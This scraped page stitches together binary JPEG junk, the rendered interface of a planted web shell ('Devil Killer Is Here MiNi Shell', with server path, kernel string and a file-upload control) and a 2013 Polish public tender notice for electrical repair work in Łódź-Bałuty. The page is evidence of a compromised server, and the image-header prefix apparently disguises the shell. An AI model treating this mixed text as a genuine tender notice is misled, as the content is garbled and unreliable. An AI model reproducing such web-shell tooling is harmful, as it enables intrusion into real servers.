JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131209/266725-N-2013.html

<p class="kh_header"><b>Łodź: ZP/22/2013 

NA 
Roboty elektryczne w zakresie usuwania awarii oraz bieżących napraw i konserwacji w budynkach i lokalach komunalnych zarządzanych przez  Administrację Zasobów Komunalnych Łódź Bałuty w podziale na 3 ZADANIA</b><br>
<b>Numer ogłoszenia: 266725 - 2013; data zamieszczenia: 09.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łodź-Bałuty , Ul. Drewnowska 5, 91-002 Łodź, woj. łódzkie, tel. 42 654 05 08, faks 42 654 75 88.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/22/2013 

NA 
Roboty elektryczne w zakresie usuwania awarii oraz bieżących napraw i konserwacji w budynkach i lokalach komunalnych zarządzanych przez  Administrację Zasobów Komunalnych Łódź Bałuty w podziale na 3 ZADANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja robót elektrycznych w zakresie usuwania awarii, bieżących napraw i konserwacji w nieruchomościach administrowanych przez Zamawiającego.
2.1 Przedmiot zamówienia został podzielony na 3 części:
     Część nr 1
    Roboty elektryczne w zakresie usuwania awarii, bieżących napraw i konserwacji świadczone w   
    nieruchomościach administrowanych przez Zamawiającego - Rejon Obsługi Nieruchomości V,  
    Rejon Obsługi Nieruchomości III .
    Szczegółowy zakres czynności określony został w cenniku robót (formularzu cenowym) 
    stanowiącym Załącznik nr 9 do SIWZ.
    Wykaz nieruchomości określony został w Załączniku nr 12 i 13 do SIWZ.
     Część nr 2
    Roboty elektryczne w zakresie usuwania awarii, bieżących napraw i konserwacji świadczone w   
    nieruchomościach administrowanych przez Zamawiającego - Rejon Obsługi Nieruchomości II,    
    Rejon Obsługi Nieruchomości IV .
    Szczegółowy zakres czynności określony został w cenniku robót (formularzu cenowym) 
    stanowiącym Załącznik nr 10 do SIWZ.
    Wykaz nieruchomości określony został w Załączniku nr 14 i 15 do SIWZ.
     Część nr 3
    Roboty elektryczne w zakresie usuwania awarii, bieżących napraw i konserwacji świadczone w   
    nieruchomościach administrowanych przez Zamawiającego - Rejon Obsługi Nieruchomości I,  
    Rejon Obsługi Nieruchomości VI, Rejon Obsługi Nieruchomości VII .
    Szczegółowy zakres czynności określony został w cenniku robót formularzu cenowym) 
    stanowiącym Załącznik nr 11 do SIWZ.
    Wykaz nieruchomości określony został w Załączniku nr 16, 17 i 18 do SIWZ.
 2.2 Usługi będą realizowane w dni powszednie oraz w dni wolne od pracy (soboty,    
        niedziele i święta) w systemie całodobowym.
2.3 Usługi świadczone będą w oparciu o zakresy czynności określone w formularzach   
       Cenowych zwanych cennikami usług stanowiące załączniki do SIWZ. 


3. Zamawiający w przedmiocie zamówienia wymaga od Wykonawcy: 
3.1.     Podstawą wykonania prac, o których mowa wyżej są:
3.1.1.     zgłoszenia pisemne służb Zamawiającego sporządzane wg wzoru (załącznik nr 2 do umowy); zgłoszenia telefoniczne służb Zamawiającego (potwierdzane zleceniem pisemnym w terminie późniejszym).
3.1.2.  zgłoszenia telefoniczne bezpośrednio od najemców w przypadkach awarii stanowiących zagrożenie życia lub mienia. W takim przypadku Wykonawca przyjmuje zlecenie i ma obowiązek powiadomić Zamawiającego  o zgłoszeniu, zaś Zamawiający wystawia zlecenia w terminie późniejszym.
   3.2.   Realizacja zgłoszeń:
3.2.1.	Usługi będą zgłaszane pod wskazany przez Wykonawcę numer telefonu i    świadczone codziennie w godzinach pracy i po godzinach pracy Administracji w dni powszednie, oraz w systemie ciągłym całodobowym w dni wolne od pracy (soboty w niedziele i święta).
3.2.2.	Pilność realizacji zgłoszeń strony ustalają: 
         		a)   natychmiastowo - awarie i zgłoszenia stanu zagrożenia dla życia, zdrowia i   
     		mienia mieszkańców. Maksymalny czas reakcji na zgłoszenie - 60 minut.  
b) W ciągu 3 dni - sprawy pilne lecz nie stanowiące zagrożenia życia, zdrowia i    
    	mienia mieszkańców.
           	c) inne - w terminach uzgodnionych z Zamawiającym.
     3.3.  Po stronie Zamawiającego zlecenia wystawiać będą  właściwi miejscowo administratorzy   
            nieruchomości (MAN) zatwierdzone przez koordynatora do kwoty netto -2 000 zł 
            Administratorzy nieruchomości są upoważnieni do wydawania Wykonawcy wszelkich    
            poleceń związanych z jakością i ilością robót objętych przedmiotem umowy.
3.3.	  Powyżej kwoty 2 000 zł netto zlecenia muszą być zatwierdzone przez pracownika nadzoru Zamawiającego. 
    3.4.   Wykonane przez Wykonawcę prace  wymagają pisemnego potwierdzenia przez   
            administratora lub pracownika nadzoru.
   4. Udzielenia gwarancji na okres minim.12 m-cy, 
   5. stosowania materiałów budowlanych posiadających atest i deklarację zgodności z obecnie 
       obowiązującymi normami i aprobatami technicznymi;
   6. przestrzegania przepisów bezpieczeństwa i higieny pracy - zgodnie z zasadami   
       bezpieczeństwa i higieny pracy określonymi w Rozporządzeniu Ministra Infrastruktury z dnia  
       06.02.2003 r. w sprawie Bezpieczeństwa i higieny pracy podczas wykonywania robót  
       budowlanych (Dz. U. Nr 47 poz. 401);
   7. odpowiedzialności za całość szkód powstałych na skutek prowadzonych prac;
   8. zachowania praw osób trzecich;
   9. sporządzania zestawień rozliczeniowych z otrzymanych zarejestrowanych zleceń za wykonane 
       czynności na podstawie faktycznie wykonanych czynności (ilości jednostek miary) i  cen  
       jednostkowych (netto) w oparciu o cennik ryczałtowy cen jednostkowych (netto) 
       - raz w miesiącu,  odrębnie, dla każdej nieruchomości. 
       Zestawienie obejmujące: nr zlecenia,  adres nieruchomości, wykaz wykonanych czynności 
       wraz z wbudowanym materiałem na nieruchomości, cenę jednostkową (netto) z cennika 
       ryczałtowego i ilość oraz wartość iloczynową zleconej roboty, potwierdzone przez właściwego 
       miejscowo administratora nieruchomości (MAN-a) lub pracownika nadzoru,  stanowić będzie   
       załącznik do wystawionych przez Wykonawcę faktur,  z wyszczególnieniem  każdej   
       nieruchomości.
       W przypadku wykonania czynności nie uwzględnionych w cenniku ryczałtowym, 
       rozliczenie tych czynności nastąpi na podstawie kosztorysu powykonawczego sporządzonego 
 przez Wykonawcę w oparciu o KNR-y  Do prac zleconych nie ujętych w cenniku ryczałtowym                        a) koszt robocizny będzie kalkulowany w następujący sposób: ilość roboczogodzin (R) wynikająca z katalogów KNR zostanie pomnożona przez cenę wynikającą z umowy, do tak wyliczonej kwoty robocizny bezpośredniej zostaną dodane koszty pośrednie a następnie zysk z umowy.
b) Koszt materiałów będzie kalkulowany w następujący sposób: nakłady (ilości) materiałów (M)wynikające z katalogów KNR pomnożone zostaną przez średnie ceny materiałów z kosztami zakupu wynikające z tabeli w publikacji kwartalnej wydawnictwa  SEKOCENBUD z kwartału poprzedzającego okres wykonywania robót. Materiały nie ujęte w w/w wydawnictwie SEKOCENBUD rozliczane będą na podstawie zaakceptowanych przez Zamawiającego rachunków zakupu, do których zostaną doliczone koszty transportu zewnętrznego wg średniego wskaźnika  kosztów zakupu ogólnopolskiego dotyczącego tejże branży z kwartału poprzedzającego okres wykonania robót.
c)	Koszt pracy sprzętu będzie kalkulowany w następujący sposób : Ilość sprzętu (S) wynikająca  z KNR pomnożona zostanie przez średnie ceny najmu z publikacji kwartalnej SEKOCENBUD z kwartału poprzedzającego okres wykonania robót. Do tak wyliczonego kosztu bezpośredniego sprzętu zostaną dodane koszty pośrednie a następnie zysk z umowy. Przy pracach szczególnych Wykonawca uzgadnia wcześniej z inwestorem rodzaj   jednostki sprzętowej i sposób obliczania nakładów (ilość maszynogodzin)  pracy oraz cenę, do tak wyliczonych kosztów bezpośrednich zostanie doliczony koszt pośredni a następnie zysk z umowy.
Z Wykonawcą wybranym w powyższym postępowaniu na dane zadanie, zostaną zawarte również  umowy na nieruchomości prywatne i współwłasne zarządzane przez AZK BAŁUTY po stawkach zaproponowanych w ofercie na każdą nieruchomość osobno na okres 12 miesięcy, które będą dołączone odpowiednio do powyższych zadań.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium jest warunkiem ważności oferty. Wysokość wadium w niniejszym postępowaniu
      wynosi: 
dla ZADANIA I	- 700,00 zł (słownie: siedemset zł )
dla ZADANIA II	- 1 000,00 zł (słownie: jeden tys. zł)
dla ZADANIA III	- 800,00 zł (słownie: osiemset zł)
2.  Wykonawca wnosi wadium (winno być na koncie Zleceniodawcy)  przed upływem  
        terminu składania ofert, o którym mowa w pkt 14.2. Okres ważności wadium wynosi 30   
       dni. Bieg ważności wadium rozpoczyna się wraz z upływem terminu składania ofert. 
        3.   Wadium może być wniesione w:
                 3.1. pieniądzu;
                  3.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
                           kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
                 3.3  gwarancjach ubezpieczeniowych;
                 3.4. gwarancjach bankowych;
                 3.5. poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2
                          Ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju  
                          Przedsiębiorczości (Dz. U. nr 109, poz. 1158, z późn. zm.)                
4.   Wadium wnoszone w pieniądzu należy wpłacać przelewem na konto:
                  GETIN BANK S.A.
                  Oddział Regionalny GETIN BANK w Łodzi
                  98 1560 0013 2376 1551 8000 0005
                  z zaznaczeniem: wadium - przetarg  ZP/22/2013 nr ZADANIA          5   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na                  
                 wezwanie, o których mowa w art. 26 ust. 3 Pzp, nie złoży dokumentów lub oświadczeń  
               o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że   
               wynika to z przyczyn  nie leżących po jego stronie art.46 ust 4a Pzp
	     6   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta
               została wybrana:
             6.1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
                       określonych w ofercie 
             6.2)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z   
                       przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy z art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich pięciu lat przed upływem terminu  
         składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał należycie: 
         dla ZADANIA I
         Roboty ciągłe polegające na bieżących naprawach, konserwacji i usuwaniu awarii dotyczące przedmiotu zamówienia  (trwające minimum 12 miesięcy) o wartości co najmniej 30 000 zł brutto  w ciągu 12 miesięcy.
         dla ZADANIA II
         Roboty ciągłe polegające na bieżących naprawach, konserwacji i usuwaniu awarii dotyczące przedmiotu zamówienia  (trwające minimum 12 miesięcy) o wartości co najmniej 40 000 zł brutto  w ciągu 12 miesięcy         
         dla ZADANIA III
         Roboty ciągłe polegające bieżących naprawach, konserwacji i usuwaniu awarii dotyczące przedmiotu zamówienia  (trwające minimum 12 miesięcy) o wartości co najmniej 35 000 zł brutto  w ciągu 12 miesięcy                     
          (Jeżeli wykonawca składa ofertę na więcej niż jedno zadanie to winien wykazać się   
          wartością odpowiadającą wartości tych zadań na ile składa ofertę) 
          Dla potrzeb oceny spełnienia warunku określonego powyżej, jeżeli wartości zostaną podane   
          w walutach innych niż PLN, Zamawiający przyjmuje średni kurs PLN do tej waluty   
          podawany przez NBP na dzień opublikowania ogłoszenia w dzienniku Urzędowym Unii    
          Europejskiej.
          Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej,  
          NBP nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się  
          średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o  
          zamówieniu w Dzienniku Urzędowym Unii Europejskiej, w którym zostanie on   
          opublikowany.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla ZADANIA I
minimum 3 pracowników posiadających następujące kwalifikacje: osoba posiadająca aktualne zaświadczenie kwalifikacyjne GRUPA 1 (E) do 1 KV, osoba z ważnym zaświadczeniem kwalifikacyjnym GRUPA 1  (D) do 1 KV,  osoba posiadająca uprawnienia kierownika budowy o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych wraz z ważnym zaświadczeniem z Okręgowej Izby Inżynierów Budownictwa 
dla ZADANIA II
minimum 3 pracowników posiadających następujące kwalifikacje: osoba posiadająca aktualne zaświadczenie kwalifikacyjne GRUPA 1 (E) do 1 KV, osoba z ważnym zaświadczeniem kwalifikacyjnym GRUPA 1  (D) do 1 KV,  osoba posiadająca uprawnienia kierownika budowy o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych wraz z ważnym zaświadczeniem z Okręgowej Izby Inżynierów Budownictwa 
dla ZADANIA III
minimum 3 pracowników posiadających następujące kwalifikacje: osoba posiadająca aktualne zaświadczenie kwalifikacyjne GRUPA 1 (E) do 1 KV, osoba z ważnym zaświadczeniem kwalifikacyjnym GRUPA 1  (D) do 1 KV,  osoba posiadająca uprawnienia kierownika budowy o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych wraz z ważnym zaświadczeniem z Okręgowej Izby Inżynierów Budownictwa 
(Jeżeli wykonawca składa ofertę na więcej niż jedno zadanie to winien wykazać się   
ilością osób odpowiadającą ilości tych zadań na ile składa ofertę, z tym że wystarczy 1 osoba posiadająca uprawnienia kierownika budowy o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych wraz z ważnym zaświadczeniem z O.I.I.B)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać że posiada opłaconą polisę a w przypadku jej braku inny   
          dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  
          w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 
          minimum:
          dla ZADANIA I	- 30 000 zł
           dla ZADANIA II	- 50 000 zł
           dla ZADANIA III	- 30 000 zł 
           Jeżeli w trakcie realizacji umowy polisa straci ważność, Zamawiający będzie żądał     
          przedłożenia kserokopii nowej polisy potwierdzonej za zgodność z oryginałem.
          (Jeżeli wykonawca składa ofertę na więcej niż jedno zadanie to winien wykazać się   
          wartością odpowiadającą wartości tych zadań na ile składa ofertę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>5.1.2.	Wykaz robót budowlanych wykonanych, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, dat i miejsca  wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, zgodnie z (załącznikiem nr 2 do SIWZ). Za najważniejsze roboty budowlane , których dotyczy obowiązek wskazania w wykazie i złożenia w/w dowodów uznaje się co najmniej roboty niezbędne do oceny spełnienia warunku określonego w pkt. 4.1.2.
           Dowodami, o których mowa wyżej są: 
        - poświadczenie, 
        - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze   
          wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. 
UWAGA:     W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, tj. od 20 lutego 2013r do 19 lutego 2014r. wykonawca, w miejsce poświadczeń, o których mowa powyżej, może przedkładać dokumenty potwierdzające należyte wykonanie usług  i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt. 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.
	W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz ofertowy  (Załącznik nr  5 do SIWZ) oraz formularze cenowe (załączniki nr 9,10,11 do SIWZ)Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia do podpisania oferty i/lub umowy (np. w formie spółki cywilnej itp.)
Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
